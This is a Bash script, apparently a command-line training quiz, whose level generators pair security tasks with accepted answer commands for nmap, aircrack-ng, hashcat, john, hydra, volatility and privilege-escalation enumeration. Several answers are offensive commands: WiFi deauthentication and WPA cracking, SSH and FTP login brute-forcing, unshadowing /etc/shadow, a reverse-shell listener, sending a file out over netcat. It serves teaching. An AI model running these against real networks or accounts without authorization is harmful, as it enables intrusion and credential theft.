  questions+=("TCP SYN scan on ${ip} (half-open)|nmap -sS ${ip}|sudo nmap -sS ${ip}")
  questions+=("Scan ${ip}, skip host discovery (treat as up)|nmap -Pn ${ip}|sudo nmap -Pn ${ip}|nmap -P0 ${ip}|sudo nmap -P0 ${ip}")
  questions+=("Ping sweep ${subnet} (find live hosts)|nmap -sn ${subnet}|nmap -sP ${subnet}|sudo nmap -sn ${subnet}|sudo nmap -sP ${subnet}|fping -ag ${subnet}|fping -a -g ${subnet}|sudo fping -ag ${subnet}|sudo fping -a -g ${subnet}")
  questions+=("List targets in ${subnet} without scanning|nmap -sL ${subnet}|sudo nmap -sL ${subnet}")
  questions+=("ARP scan local network ${subnet}|nmap -PR -sn ${subnet}|sudo nmap -PR -sn ${subnet}|nmap -sn -PR ${subnet}|sudo nmap -sn -PR ${subnet}|arp-scan ${subnet}|sudo arp-scan ${subnet}|arp-scan -l|sudo arp-scan -l|arp-scan --localnet|sudo arp-scan --localnet")
  questions+=("Scan ${ip}, save all formats to 'scan' prefix|nmap -oA scan ${ip}|sudo nmap -oA scan ${ip}|nmap ${ip} -oA scan|sudo nmap ${ip} -oA scan")
  questions+=("Scan ${ip}, save greppable output to ${W}scan.gnmap${C}|nmap -oG scan.gnmap ${ip}|sudo nmap -oG scan.gnmap ${ip}|nmap ${ip} -oG scan.gnmap|sudo nmap ${ip} -oG scan.gnmap")
  questions+=("Run vulnerability scripts on ${ip}|nmap --script vuln ${ip}|nmap --script=vuln ${ip}|sudo nmap --script vuln ${ip}|sudo nmap --script=vuln ${ip}")
  questions+=("Banner grab port ${port} on ${ip}|nmap -sV -p ${port} --script banner ${ip}|nmap -sV -p${port} --script banner ${ip}|nmap -sV -p ${port} --script=banner ${ip}|nmap -sV -p${port} --script=banner ${ip}|sudo nmap -sV -p ${port} --script banner ${ip}|sudo nmap -sV -p${port} --script banner ${ip}|sudo nmap -sV -p ${port} --script=banner ${ip}|sudo nmap -sV -p${port} --script=banner ${ip}|nmap --script banner -p ${port} ${ip}|nmap --script=banner -p ${port} ${ip}|nmap --script banner -p${port} ${ip}|nmap --script=banner -p${port} ${ip}|sudo nmap --script banner -p ${port} ${ip}|sudo nmap --script=banner -p ${port} ${ip}|sudo nmap --script banner -p${port} ${ip}|sudo nmap --script=banner -p${port} ${ip}")
  questions+=("Enumerate SMB shares on ${ip}|nmap --script smb-enum-shares ${ip}|nmap --script=smb-enum-shares ${ip}|sudo nmap --script smb-enum-shares ${ip}|sudo nmap --script=smb-enum-shares ${ip}")
  questions+=("Enumerate HTTP methods on ${ip}|nmap --script http-methods -p 80,443 ${ip}|nmap --script=http-methods -p 80,443 ${ip}|nmap --script http-methods -p80,443 ${ip}|nmap --script=http-methods -p80,443 ${ip}|sudo nmap --script http-methods -p 80,443 ${ip}|sudo nmap --script=http-methods -p 80,443 ${ip}|sudo nmap --script http-methods -p80,443 ${ip}|sudo nmap --script=http-methods -p80,443 ${ip}|nmap --script http-methods -p 443,80 ${ip}|nmap --script=http-methods -p 443,80 ${ip}|nmap --script http-methods -p443,80 ${ip}|nmap --script=http-methods -p443,80 ${ip}|sudo nmap --script http-methods -p 443,80 ${ip}|sudo nmap --script=http-methods -p 443,80 ${ip}|sudo nmap --script http-methods -p443,80 ${ip}|sudo nmap --script=http-methods -p443,80 ${ip}")
  questions+=("Check for anonymous FTP on ${ip}|nmap --script ftp-anon -p 21 ${ip}|nmap --script=ftp-anon -p 21 ${ip}|nmap --script ftp-anon -p21 ${ip}|nmap --script=ftp-anon -p21 ${ip}|sudo nmap --script ftp-anon -p 21 ${ip}|sudo nmap --script=ftp-anon -p 21 ${ip}|sudo nmap --script ftp-anon -p21 ${ip}|sudo nmap --script=ftp-anon -p21 ${ip}")
  questions+=("Slow scan ${ip} (evade IDS)|nmap -T1 ${ip}|nmap -T 1 ${ip}|nmap -T sneaky ${ip}|sudo nmap -T1 ${ip}|sudo nmap -T 1 ${ip}|sudo nmap -T sneaky ${ip}|nmap -T0 ${ip}|nmap -T paranoid ${ip}|sudo nmap -T0 ${ip}|sudo nmap -T paranoid ${ip}")
  questions+=("Aggressive timing scan ${ip} (faster)|nmap -T4 ${ip}|nmap -T 4 ${ip}|nmap -T aggressive ${ip}|sudo nmap -T4 ${ip}|sudo nmap -T 4 ${ip}|sudo nmap -T aggressive ${ip}")
  questions+=("Full scan: all ports, version, scripts, all outputs|nmap -p- -sV -sC -oA full ${ip}|nmap -p- -sC -sV -oA full ${ip}|nmap -p- -sCV -oA full ${ip}|nmap -p- -sVC -oA full ${ip}|nmap -p- -A -oA full ${ip}|sudo nmap -p- -sV -sC -oA full ${ip}|sudo nmap -p- -sC -sV -oA full ${ip}|sudo nmap -p- -sCV -oA full ${ip}|sudo nmap -p- -sVC -oA full ${ip}|sudo nmap -p- -A -oA full ${ip}")
}

# Level 26: WiFi & RF
gen_level26() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  _fpick WIFI_INTERFACES; local wiface=$REPLY
  questions+=("Enable monitor mode on ${wiface}|airmon-ng start ${wiface}|sudo airmon-ng start ${wiface}")
  questions+=("Scan for WiFi networks|airodump-ng ${wiface}mon|sudo airodump-ng ${wiface}mon")
  questions+=("Capture handshake from AP ${W}${mac}${C} on channel 6, write to ${W}capture${C}|airodump-ng -c 6 --bssid ${mac} -w capture ${wiface}mon|sudo airodump-ng -c 6 --bssid ${mac} -w capture ${wiface}mon|airodump-ng --bssid ${mac} --channel 6 --write capture ${wiface}mon|airodump-ng --bssid ${mac} --channel 6 -w capture ${wiface}mon|airodump-ng --bssid ${mac} -c 6 --write capture ${wiface}mon|airodump-ng -c 6 --bssid ${mac} --write capture ${wiface}mon|sudo airodump-ng --bssid ${mac} --channel 6 --write capture ${wiface}mon|sudo airodump-ng --bssid ${mac} --channel 6 -w capture ${wiface}mon|sudo airodump-ng --bssid ${mac} -c 6 --write capture ${wiface}mon|sudo airodump-ng -c 6 --bssid ${mac} --write capture ${wiface}mon")
  questions+=("Send ${W}5${C} deauth packets to force handshake|aireplay-ng -0 5 -a ${mac} ${wiface}mon|aireplay-ng --deauth 5 -a ${mac} ${wiface}mon|sudo aireplay-ng -0 5 -a ${mac} ${wiface}mon|sudo aireplay-ng --deauth 5 -a ${mac} ${wiface}mon|aireplay-ng -a ${mac} -0 5 ${wiface}mon|sudo aireplay-ng -a ${mac} -0 5 ${wiface}mon|aireplay-ng -a ${mac} --deauth 5 ${wiface}mon|sudo aireplay-ng -a ${mac} --deauth 5 ${wiface}mon")
  questions+=("Crack WPA handshake in ${W}capture-01.cap${C} using ${W}${wordlist}${C}|aircrack-ng -w ${wordlist} capture-01.cap|sudo aircrack-ng -w ${wordlist} capture-01.cap|aircrack-ng capture-01.cap -w ${wordlist}|sudo aircrack-ng capture-01.cap -w ${wordlist}")
  questions+=("Start reverse shell listener on port ${port}|nc -lvnp ${port}|nc -nlvp ${port}|nc -lvp ${port}|nc -lp ${port}|ncat -lvnp ${port}|ncat -nlvp ${port}|ncat -lvp ${port}|ncat -lp ${port}|sudo nc -lvnp ${port}|sudo nc -nlvp ${port}|sudo nc -lvp ${port}|sudo nc -lp ${port}|sudo ncat -lvnp ${port}|sudo ncat -nlvp ${port}|sudo ncat -lvp ${port}|sudo ncat -lp ${port}")
  questions+=("Connect to remote port|nc ${ip} ${port}|ncat ${ip} ${port}|telnet ${ip} ${port}|nc -v ${ip} ${port}|nc -nv ${ip} ${port}|ncat -v ${ip} ${port}|ncat -nv ${ip} ${port}")
  questions+=("Send ${W}${txt}${C} via netcat§nc ${ip} ${port} < ${txt}§ncat ${ip} ${port} < ${txt}§cat ${txt} | nc ${ip} ${port}§cat ${txt} | ncat ${ip} ${port}")
  questions+=("Scan ports 1-1000 on ${W}${ip}${C} with netcat|nc -zv ${ip} 1-1000|nc -z ${ip} 1-1000|nc -vz ${ip} 1-1000|ncat -zv ${ip} 1-1000|ncat -z ${ip} 1-1000|ncat -vz ${ip} 1-1000")
  questions+=("Mass scan all ports on ${W}${ip%.*}.0/24${C} at 10k rate|masscan -p1-65535 ${ip%.*}.0/24 --rate 10000|masscan -p 1-65535 ${ip%.*}.0/24 --rate 10000|masscan -p1-65535 ${ip%.*}.0/24 --rate=10000|masscan -p 1-65535 ${ip%.*}.0/24 --rate=10000|sudo masscan -p1-65535 ${ip%.*}.0/24 --rate 10000|sudo masscan -p 1-65535 ${ip%.*}.0/24 --rate 10000|sudo masscan -p1-65535 ${ip%.*}.0/24 --rate=10000|sudo masscan -p 1-65535 ${ip%.*}.0/24 --rate=10000")
  questions+=("Masscan ports ${W}22,80,443${C} on ${W}${ip%.*}.0/24${C} at rate 1000|masscan -p 22,80,443 ${ip%.*}.0/24 --rate 1000|masscan -p22,80,443 ${ip%.*}.0/24 --rate 1000|masscan -p 22,80,443 ${ip%.*}.0/24 --rate=1000|masscan -p22,80,443 ${ip%.*}.0/24 --rate=1000|sudo masscan -p 22,80,443 ${ip%.*}.0/24 --rate 1000|sudo masscan -p22,80,443 ${ip%.*}.0/24 --rate 1000|sudo masscan -p 22,80,443 ${ip%.*}.0/24 --rate=1000|sudo masscan -p22,80,443 ${ip%.*}.0/24 --rate=1000")
  questions+=("Capture packets on ${iface}|tcpdump -i ${iface}|sudo tcpdump -i ${iface}|tshark -i ${iface}|sudo tshark -i ${iface}")
  questions+=("Capture and save to ${W}${pcap}${C}|tcpdump -i ${iface} -w ${pcap}|sudo tcpdump -i ${iface} -w ${pcap}|tshark -i ${iface} -w ${pcap}|sudo tshark -i ${iface} -w ${pcap}")
  questions+=("Read saved ${W}${pcap}${C}|tcpdump -r ${pcap}|sudo tcpdump -r ${pcap}|tshark -r ${pcap}|tcpdump -nr ${pcap}|sudo tcpdump -nr ${pcap}|sudo tshark -r ${pcap}")
  questions+=("Capture only port ${port} traffic|tcpdump -i ${iface} port ${port}|sudo tcpdump -i ${iface} port ${port}|tcpdump -i ${iface} 'port ${port}'|sudo tcpdump -i ${iface} 'port ${port}'|tshark -i ${iface} -f 'port ${port}'|sudo tshark -i ${iface} -f 'port ${port}'")
  questions+=("Capture only traffic to/from ${ip}|tcpdump -i ${iface} host ${ip}|sudo tcpdump -i ${iface} host ${ip}|tcpdump -i ${iface} 'host ${ip}'|sudo tcpdump -i ${iface} 'host ${ip}'|tshark -i ${iface} -f 'host ${ip}'|sudo tshark -i ${iface} -f 'host ${ip}'")
  questions+=("Capture first ${n} packets|tcpdump -i ${iface} -c ${n}|sudo tcpdump -i ${iface} -c ${n}|tshark -i ${iface} -c ${n}|sudo tshark -i ${iface} -c ${n}")
  questions+=("Capture with verbose output|tcpdump -i ${iface} -v|tcpdump -i ${iface} -vv|tcpdump -i ${iface} -vvv|sudo tcpdump -i ${iface} -v|sudo tcpdump -i ${iface} -vv|sudo tcpdump -i ${iface} -vvv|tshark -i ${iface} -V|sudo tshark -i ${iface} -V")
  questions+=("Capture and show packet contents as ASCII|tcpdump -i ${iface} -A|sudo tcpdump -i ${iface} -A|tshark -i ${iface} -x|sudo tshark -i ${iface} -x")
  questions+=("Capture with hex and ASCII dump|tcpdump -i ${iface} -X|sudo tcpdump -i ${iface} -X|tcpdump -i ${iface} -XX|sudo tcpdump -i ${iface} -XX")
  questions+=("Don't resolve hostnames in capture|tcpdump -i ${iface} -n|sudo tcpdump -i ${iface} -n|tcpdump -i ${iface} -nn|sudo tcpdump -i ${iface} -nn|tshark -i ${iface} -n|sudo tshark -i ${iface} -n")
  questions+=("Show wireless interfaces|iw dev|iwconfig|sudo iw dev|sudo iwconfig")
  questions+=("Scan for nearby APs|iw dev ${wiface} scan|iwlist ${wiface} scan|sudo iw dev ${wiface} scan|sudo iwlist ${wiface} scan|nmcli dev wifi list|nmcli device wifi list")
  questions+=("Show connected WiFi info|iw dev ${wiface} link|iwconfig ${wiface}|sudo iw dev ${wiface} link|sudo iwconfig ${wiface}")
  questions+=("Set WiFi channel to 6|iw dev ${wiface}mon set channel 6|sudo iw dev ${wiface}mon set channel 6|iwconfig ${wiface}mon channel 6|sudo iwconfig ${wiface}mon channel 6")
  questions+=("Disable monitor mode|airmon-ng stop ${wiface}mon|sudo airmon-ng stop ${wiface}mon")
}

# Level 27: Hash Cracking
gen_level27() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  _frnum 0 $((${#HASHCAT_MODES[@]} - 1)); local hidx=$REPLY
  local hmode=${HASHCAT_MODES[$hidx]} hname=${HASH_NAMES[$hidx]}
  questions+=("Dictionary attack on MD5 (-m 0) hashes in ${hash} using ${W}${wordlist}${C}|hashcat -m 0 ${hash} ${wordlist}|hashcat -a 0 -m 0 ${hash} ${wordlist}|hashcat -m 0 -a 0 ${hash} ${wordlist}|hashcat --hash-type 0 ${hash} ${wordlist}|hashcat -a 0 --hash-type 0 ${hash} ${wordlist}|hashcat --hash-type 0 -a 0 ${hash} ${wordlist}")
  questions+=("Dictionary attack on ${hname} (-m ${hmode}) hashes using ${W}${wordlist}${C}|hashcat -m ${hmode} ${hash} ${wordlist}|hashcat -a 0 -m ${hmode} ${hash} ${wordlist}|hashcat -m ${hmode} -a 0 ${hash} ${wordlist}|hashcat --hash-type ${hmode} ${hash} ${wordlist}|hashcat -a 0 --hash-type ${hmode} ${hash} ${wordlist}|hashcat --hash-type ${hmode} -a 0 ${hash} ${wordlist}")
  questions+=("Crack Windows NTLM hashes (-m 1000) in ${hash} using ${W}${wordlist}${C}|hashcat -m 1000 ${hash} ${wordlist}|hashcat -a 0 -m 1000 ${hash} ${wordlist}|hashcat -m 1000 -a 0 ${hash} ${wordlist}|hashcat --hash-type 1000 ${hash} ${wordlist}|hashcat -a 0 --hash-type 1000 ${hash} ${wordlist}|hashcat --hash-type 1000 -a 0 ${hash} ${wordlist}")
  questions+=("Brute force 4-digit PIN (MD5) in ${W}${hash}${C}|hashcat -m 0 -a 3 ${hash} ?d?d?d?d|hashcat -a 3 -m 0 ${hash} ?d?d?d?d")
  questions+=("Mask attack on ${W}${hash}${C}: Capital + 5 lower + 2 digits|hashcat -m 0 -a 3 ${hash} ?u?l?l?l?l?l?d?d|hashcat -a 3 -m 0 ${hash} ?u?l?l?l?l?l?d?d")
  questions+=("Crack ${hash} with ${W}rules/best64.rule${C} ruleset using ${W}${wordlist}${C}|hashcat -m 0 -r rules/best64.rule ${hash} ${wordlist}|hashcat -m 0 --rules-file rules/best64.rule ${hash} ${wordlist}|hashcat -r rules/best64.rule -m 0 ${hash} ${wordlist}|hashcat --rules-file rules/best64.rule -m 0 ${hash} ${wordlist}")
  questions+=("Show already cracked MD5 hashes from ${W}${hash}${C}|hashcat -m 0 ${hash} --show|hashcat --show -m 0 ${hash}")
  questions+=("Resume interrupted hashcat session|hashcat --restore|hashcat --restore --session=default")
  questions+=("Crack ${hash} with john (auto-detect format)|john ${hash}|john --format=auto ${hash}")
  questions+=("Crack ${hash} with john using ${wordlist}|john --wordlist=${wordlist} ${hash}|john --wordlist ${wordlist} ${hash}|john -w=${wordlist} ${hash}|john -w ${wordlist} ${hash}")
  questions+=("Show cracked passwords from john|john --show ${hash}")
  questions+=("List supported john formats|john --list=formats|john --list formats")
  questions+=("Extract hash from encrypted ZIP file|zip2john archive.zip > hash.txt|~^zip2john archive\.zip > .+$")
  questions+=("Extract hash from encrypted PDF|pdf2john document.pdf > hash.txt|~^pdf2john document\.pdf > .+$")
  questions+=("Extract hash from encrypted RAR|rar2john archive.rar > hash.txt|~^rar2john archive\.rar > .+$")
  questions+=("Extract hash from ${W}/etc/shadow${C} format|unshadow /etc/passwd /etc/shadow > hash.txt|sudo unshadow /etc/passwd /etc/shadow > hash.txt|~^(sudo )?unshadow /etc/passwd /etc/shadow > .+$")
  questions+=("Brute force SSH login for ${user} on ${ip} using ${W}${wordlist}${C}|hydra -l ${user} -P ${wordlist} ${ip} ssh|hydra -l ${user} -P ${wordlist} ssh://${ip}|hydra -P ${wordlist} -l ${user} ${ip} ssh|hydra -P ${wordlist} -l ${user} ssh://${ip}")
  questions+=("Brute force FTP login for ${user} on ${ip} using ${W}${wordlist}${C}|hydra -l ${user} -P ${wordlist} ${ip} ftp|hydra -l ${user} -P ${wordlist} ftp://${ip}|hydra -P ${wordlist} -l ${user} ${ip} ftp|hydra -P ${wordlist} -l ${user} ftp://${ip}")
  questions+=("Brute force HTTP basic auth on ${ip} using ${W}${wordlist}${C}|hydra -l ${user} -P ${wordlist} ${ip} http-get /|hydra -l ${user} -P ${wordlist} http-get://${ip}/|hydra -P ${wordlist} -l ${user} ${ip} http-get /|hydra -P ${wordlist} -l ${user} http-get://${ip}/")
  questions+=("Hydra HTTP POST: form at /login, fields user=^USER^&pass=^PASS^, fail string 'Invalid'|hydra -l ${user} -P ${wordlist} ${ip} http-post-form '/login:user=^USER^&pass=^PASS^:Invalid'|hydra -l ${user} -P ${wordlist} http-post-form://${ip}/login:user=^USER^&pass=^PASS^:Invalid|hydra -P ${wordlist} -l ${user} ${ip} http-post-form '/login:user=^USER^&pass=^PASS^:Invalid'|hydra -P ${wordlist} -l ${user} http-post-form://${ip}/login:user=^USER^&pass=^PASS^:Invalid")
  questions+=("Brute force with ${W}${wordlist}${C} and username list|hydra -L users.txt -P ${wordlist} ${ip} ssh|hydra -L users.txt -P ${wordlist} ssh://${ip}|hydra -P ${wordlist} -L users.txt ${ip} ssh|hydra -P ${wordlist} -L users.txt ssh://${ip}")
  questions+=("Brute force with ${W}${wordlist}${C}, limit to 4 parallel tasks|hydra -t 4 -l ${user} -P ${wordlist} ${ip} ssh|hydra -t 4 -l ${user} -P ${wordlist} ssh://${ip}|hydra -t 4 -P ${wordlist} -l ${user} ${ip} ssh|hydra -t 4 -P ${wordlist} -l ${user} ssh://${ip}|hydra -l ${user} -P ${wordlist} -t 4 ${ip} ssh|hydra -P ${wordlist} -l ${user} -t 4 ${ip} ssh")
  questions+=("Encode string 'secret' to base64§echo -n 'secret' | base64§echo -n \"secret\" | base64§echo -n secret | base64§printf 'secret' | base64§printf \"secret\" | base64§printf secret | base64§printf '%s' 'secret' | base64§printf '%s' secret | base64")
  questions+=("Decode base64 file ${W}encoded.txt${C}§base64 -d encoded.txt§base64 --decode encoded.txt§base64 -d < encoded.txt§base64 --decode < encoded.txt§cat encoded.txt | base64 -d§cat encoded.txt | base64 --decode")
  questions+=("Generate MD5 hash of string 'password'§echo -n 'password' | md5sum§echo -n \"password\" | md5sum§echo -n password | md5sum§printf 'password' | md5sum§printf password | md5sum§printf '%s' 'password' | md5sum§printf '%s' password | md5sum§printf '%s' \"password\" | md5sum§printf \"%s\" \"password\" | md5sum§printf \"%s\" password | md5sum§echo -n 'password' | openssl md5§echo -n password | openssl md5§printf 'password' | openssl md5§printf password | openssl md5")
  questions+=("Generate SHA256 hash of string 'password'§echo -n 'password' | sha256sum§echo -n \"password\" | sha256sum§echo -n password | sha256sum§printf 'password' | sha256sum§printf password | sha256sum§printf '%s' 'password' | sha256sum§printf '%s' password | sha256sum§printf '%s' \"password\" | sha256sum§printf \"%s\" \"password\" | sha256sum§echo -n 'password' | openssl sha256§echo -n password | openssl sha256§printf 'password' | openssl sha256§printf password | openssl sha256§echo -n 'password' | openssl dgst -sha256§echo -n password | openssl dgst -sha256§printf 'password' | openssl dgst -sha256§printf password | openssl dgst -sha256")
  questions+=("Generate SHA256 hash of file ${hash}|sha256sum ${hash}|sha256sum < ${hash}|shasum -a 256 ${hash}|openssl dgst -sha256 ${hash}|openssl sha256 ${hash}")
  questions+=("Convert 'hello' to hex§echo -n 'hello' | xxd -p§echo -n \"hello\" | xxd -p§echo -n hello | xxd -p§printf 'hello' | xxd -p§printf hello | xxd -p§printf '%s' 'hello' | xxd -p§printf '%s' hello | xxd -p§printf '%s' \"hello\" | xxd -p§printf \"%s\" \"hello\" | xxd -p§printf \"%s\" hello | xxd -p")
  questions+=("Convert hex back to ascii§echo '68656c6c6f' | xxd -r -p§echo -n '68656c6c6f' | xxd -r -p§echo 68656c6c6f | xxd -r -p§echo -n 68656c6c6f | xxd -r -p§printf '68656c6c6f' | xxd -r -p§printf 68656c6c6f | xxd -r -p§printf '%s' '68656c6c6f' | xxd -r -p§printf '%s' 68656c6c6f | xxd -r -p§printf '%s' \"68656c6c6f\" | xxd -r -p§printf \"%s\" \"68656c6c6f\" | xxd -r -p")
  questions+=("Hex dump ${W}${bin}${C} with addresses|xxd ${bin}|hexdump -C ${bin}|hd ${bin}|od -A x -t x1z ${bin}")
  questions+=("Hex dump ${W}${bin}${C} (no addresses)|xxd -p ${bin}|xxd --plain ${bin}|xxd -ps ${bin}")
}

# Level 28: Forensics
gen_level28() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  questions+=("Extract ASCII strings from ${bin}|strings ${bin}|strings -a ${bin}|strings --all ${bin}")
  questions+=("Extract strings minimum 10 chars in ${W}${bin}${C}|strings -n 10 ${bin}|strings --bytes=10 ${bin}|strings --bytes 10 ${bin}")
  questions+=("Extract Unicode strings (Windows binaries) in ${W}${bin}${C}|strings -e l ${bin}|strings --encoding=l ${bin}|strings --encoding l ${bin}")
  questions+=("Find URLs in ${W}${bin}${C}§strings ${bin} | grep -E 'https?://'§strings ${bin} | egrep 'https?://'§strings ${bin} | grep -oE 'https?://[^ ]+'")
  questions+=("Find email addresses in ${W}${bin}${C}§strings ${bin} | grep -E '[A-Za-z0-9._%+-]+@'§strings ${bin} | egrep '[A-Za-z0-9._%+-]+@'§strings ${bin} | grep -oE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+'")
  questions+=("Show ELF file header in ${W}${bin}${C}|readelf -h ${bin}|readelf --file-header ${bin}|objdump -f ${bin}")
  questions+=("Show ELF symbols in ${W}${bin}${C}|readelf -s ${bin}|readelf --syms ${bin}|readelf --symbols ${bin}|nm ${bin}|objdump -t ${bin}|objdump --syms ${bin}")
  questions+=("Show all ELF info in ${W}${bin}${C}|readelf -a ${bin}|readelf --all ${bin}")
  questions+=("List shared library dependencies of ${W}${bin}${C}|ldd ${bin}|objdump -p ${bin} | grep NEEDED|readelf -d ${bin} | grep NEEDED")
  questions+=("Analyze ${bin} with radare2|r2 -A ${bin}|radare2 -A ${bin}")
  questions+=("Disassemble main function of ${W}${bin}${C}|r2 -qc 'aaa; pdf @main' ${bin}|r2 -qc \"aaa; pdf @main\" ${bin}|radare2 -qc 'aaa; pdf @main' ${bin}|radare2 -qc \"aaa; pdf @main\" ${bin}")
  questions+=("List functions in ${W}${bin}${C}|r2 -qc 'aaa; afl' ${bin}|r2 -qc \"aaa; afl\" ${bin}|radare2 -qc 'aaa; afl' ${bin}|radare2 -qc \"aaa; afl\" ${bin}")
  questions+=("Scan ${bin} for embedded files|binwalk ${bin}|binwalk -B ${bin}|binwalk --signature ${bin}")
  questions+=("Extract embedded files from ${bin}|binwalk -e ${bin}|binwalk --extract ${bin}")
  questions+=("Analyze entropy of ${bin}|binwalk -E ${bin}|binwalk --entropy ${bin}")
  local -a _MEM_IMGS=(memory.dmp pagefile.sys memdump.raw)
  _fpick _MEM_IMGS; local memimg=$REPLY
  questions+=("List processes from memory dump|vol -f ${memimg} windows.pslist|vol.py -f ${memimg} windows.pslist|vol3 -f ${memimg} windows.pslist|vol3.py -f ${memimg} windows.pslist|volatility -f ${memimg} windows.pslist|volatility3 -f ${memimg} windows.pslist")
  questions+=("List network connections from memory|vol -f ${memimg} windows.netscan|vol.py -f ${memimg} windows.netscan|vol3 -f ${memimg} windows.netscan|vol3.py -f ${memimg} windows.netscan|volatility -f ${memimg} windows.netscan|volatility3 -f ${memimg} windows.netscan")
  questions+=("Show command lines of processes|vol -f ${memimg} windows.cmdline|vol.py -f ${memimg} windows.cmdline|vol3 -f ${memimg} windows.cmdline|vol3.py -f ${memimg} windows.cmdline|volatility -f ${memimg} windows.cmdline|volatility3 -f ${memimg} windows.cmdline")
  questions+=("Scan for files in memory dump|vol -f ${memimg} windows.filescan|vol.py -f ${memimg} windows.filescan|vol3 -f ${memimg} windows.filescan|vol3.py -f ${memimg} windows.filescan|volatility -f ${memimg} windows.filescan|volatility3 -f ${memimg} windows.filescan")
  questions+=("Extract all metadata from ${photo}|exiftool ${photo}|exiftool -all ${photo}|exiftool -a ${photo}")
  questions+=("Extract GPS coordinates from ${W}${photo}${C}|exiftool '-GPS*' ${photo}|exiftool -GPSPosition ${photo}|exiftool -gps:all ${photo}|exiftool -GPS* ${photo}|exiftool '-gps*' ${photo}|exiftool -gps* ${photo}")
  questions+=("Remove all metadata from ${photo}|exiftool -all= ${photo}|exiftool -all= -overwrite_original ${photo}|exiftool -overwrite_original -all= ${photo}")
  questions+=("Create disk image of /dev/sda to ${W}${img}${C} (bs=4M, show progress)|dd if=/dev/sda of=${img} bs=4M status=progress|dd bs=4M if=/dev/sda of=${img} status=progress|dd if=/dev/sda bs=4M of=${img} status=progress|dd of=${img} if=/dev/sda bs=4M status=progress|dd of=${img} bs=4M if=/dev/sda status=progress|dd bs=4M of=${img} if=/dev/sda status=progress|sudo dd if=/dev/sda of=${img} bs=4M status=progress|sudo dd bs=4M if=/dev/sda of=${img} status=progress|sudo dd if=/dev/sda bs=4M of=${img} status=progress|sudo dd of=${img} if=/dev/sda bs=4M status=progress|sudo dd of=${img} bs=4M if=/dev/sda status=progress|sudo dd bs=4M of=${img} if=/dev/sda status=progress")
  questions+=("Mount ${W}${img}${C} read-only at /mnt/evidence|mount -o ro,loop ${img} /mnt/evidence|mount -o loop,ro ${img} /mnt/evidence|sudo mount -o ro,loop ${img} /mnt/evidence|sudo mount -o loop,ro ${img} /mnt/evidence|mount -r -o loop ${img} /mnt/evidence|sudo mount -r -o loop ${img} /mnt/evidence|mount --read-only -o loop ${img} /mnt/evidence|sudo mount --read-only -o loop ${img} /mnt/evidence")
  questions+=("Verify checksums file|sha256sum -c ${hash}|sha256sum --check ${hash}|md5sum -c ${hash}|md5sum --check ${hash}|shasum -c ${hash}|shasum --check ${hash}")
  questions+=("Recover deleted files from ${img}|foremost -i ${img}|scalpel ${img}|photorec ${img}")
  questions+=("Recover JPG and PDF files from ${W}${img}${C}|foremost -t jpg,pdf -i ${img}|foremost -i ${img} -t jpg,pdf|foremost -t pdf,jpg -i ${img}|foremost -i ${img} -t pdf,jpg")
  questions+=("Foremost with custom output dir on ${W}${img}${C}|foremost -i ${img} -o ${dir}/|foremost -i ${img} -o ${dir}|foremost -o ${dir}/ -i ${img}|foremost -o ${dir} -i ${img}")
  questions+=("List files in ${W}${img}${C} (TSK)|fls ${img}|fls -l ${img}|fls -p ${img}")
  questions+=("List files recursively in ${W}${img}${C}|fls -r ${img}")
  questions+=("List deleted files in ${W}${img}${C}|fls -d ${img}")
  questions+=("Create filesystem timeline|mactime -b ${dir}/bodyfile|~^mactime -b .+$")
  questions+=("Create bodyfile from ${W}${img}${C}|fls -r -m / ${img} > ${dir}/bodyfile|fls -m / -r ${img} > ${dir}/bodyfile")
}

# Level 29: Privilege Escalation
gen_level29() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  questions+=("Find all SUID binaries|find / -perm -4000 -type f 2>/dev/null|find / -perm -u=s -type f 2>/dev/null|find / -perm /4000 -type f 2>/dev/null|find / -perm /u=s -type f 2>/dev/null|find / -type f -perm -4000 2>/dev/null|find / -type f -perm -u=s 2>/dev/null|find / -type f -perm /4000 2>/dev/null|find / -type f -perm /u=s 2>/dev/null")
  questions+=("Find SUID or SGID binaries|find / -perm /6000 -type f 2>/dev/null|find / -perm /u=s,g=s -type f 2>/dev/null|find / -type f -perm /6000 2>/dev/null|find / -type f -perm /u=s,g=s 2>/dev/null")
  questions+=("Find files with capabilities|getcap -r / 2>/dev/null|sudo getcap -r / 2>/dev/null")
  questions+=("Show current user and groups|id|groups")
  questions+=("Show sudoers rules|sudo -l|sudo --list")
  questions+=("Check sudo version (CVE check)|sudo --version|sudo -V")
  questions+=("Check if user in docker/lxd group§id | grep -E 'docker|lxd'§groups | grep -E 'docker|lxd'§id -nG | grep -E 'docker|lxd'§id | egrep 'docker|lxd'§groups | egrep 'docker|lxd'§id | rg 'docker|lxd'§groups | rg 'docker|lxd'")
  questions+=("Show OS and kernel version|uname -a|uname --all|hostnamectl|cat /proc/version|cat /etc/os-release")
  questions+=("Show running processes|ps aux|ps -ef|ps -aux|ps -e|ps -A")
  questions+=("Show network connections|ss -tlpn|netstat -tlpn|ss -tulpn|netstat -tulpn|ss -antp|netstat -antp|ss -antup|netstat -antup")
  questions+=("Show cron jobs|cat /etc/crontab; crontab -l|cat /etc/crontab && crontab -l|crontab -l|cat /etc/crontab|sudo crontab -l")
  questions+=("Show mounted filesystems|mount|df -h|findmnt|cat /proc/mounts|cat /etc/mtab")
  questions+=("Find config files with passwords|grep -ri 'password' /etc/ 2>/dev/null|grep -ri 'password' /etc 2>/dev/null|grep -rli 'password' /etc/ 2>/dev/null|grep -ril 'password' /etc/ 2>/dev/null|rg -i password /etc/|rg -il password /etc/|rg -i 'password' /etc/|rg -il 'password' /etc/|grep -ri password /etc/ 2>/dev/null|grep -ri password /etc 2>/dev/null|rg -i password /etc|rg -il password /etc|rg -i 'password' /etc")
  questions+=("Check ${W}.bash_history${C}|cat ~/.bash_history|history|less ~/.bash_history")
